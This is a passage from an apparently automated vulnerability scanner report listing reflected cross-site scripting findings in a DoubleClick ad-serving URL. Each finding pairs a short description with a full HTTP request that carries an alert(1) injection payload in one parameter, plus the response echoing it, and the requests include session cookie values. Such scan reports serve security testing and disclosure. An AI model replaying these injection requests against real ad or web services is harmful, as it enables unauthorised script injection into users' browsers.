Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
3B4307-300/250%3B41001877/41019664/2%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=085b43"-alert(1)-"5c6dd508a9d&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&
...[SNIP]...

3.90. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7dfb5"-alert(1)-"406b18d8a5c was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=7dfb5"-alert(1)-"406b18d8a5c&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=7dfb5"-alert(1)-"406b18d8a5c&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcal
...[SNIP]...

3.91. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ba13"-alert(1)-"266cdf29ddf was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=1ba13"-alert(1)-"266cdf29ddf&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=1ba13"-alert(1)-"266cdf29ddf&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
v
...[SNIP]...

3.92. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a000c"-alert(1)-"a796382a003 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=a000c"-alert(1)-"a796382a003&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=a000c"-alert(1)-"a796382a003&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/h
...[SNIP]...

3.93. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [epartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56f8d"-alert(1)-"1d00a0e4e7e was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=56f8d"-alert(1)-"1d00a0e4e7e&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=56f8d"-alert(1)-"1d00a0e4e7e&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var w
...[SNIP]...

3.94. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [event parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18f6d"-alert(1)-"51b7a82ca5c was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=18f6d"-alert(1)-"51b7a82ca5c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5755
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:49 GMT
Expires: Wed, 27 Apr 2011 23:22:49 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=18f6d"-alert(1)-"51b7a82ca5chttp://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH =
...[SNIP]...

3.95. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae410"-alert(1)-"76768d80340 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cnae410"-alert(1)-"76768d80340&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5764

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
/3af6/17/160/%2a/r%3B234979442%3B0-0%3B0%3B57848298%3B4307-300/250%3B38213956/38231713/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cnae410"-alert(1)-"76768d80340&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243
...[SNIP]...

3.96. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [l parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d8a3"-alert(1)-"87b5e52dc7f was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US9d8a3"-alert(1)-"87b5e52dc7f&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5764

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
d%3B234979442%3B1-0%3B0%3B57848298%3B4307-300/250%3B38213964/38231721/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US9d8a3"-alert(1)-"87b5e52dc7f&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760
...[SNIP]...

3.97. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [nd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23571"-alert(1)-"929e9d3e54f was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=10023571"-alert(1)-"929e9d3e54f&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=10023571"-alert(1)-"929e9d3e54f&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.2
...[SNIP]...

3.98. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [o parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af8af"-alert(1)-"f718173ff91 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253aaf8af"-alert(1)-"f718173ff91&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
%3Dv8/3af6/17/160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253aaf8af"-alert(1)-"f718173ff91&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.21
...[SNIP]...

3.99. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebd9b"-alert(1)-"c91cb2fcc46 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=ebd9b"-alert(1)-"c91cb2fcc46&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
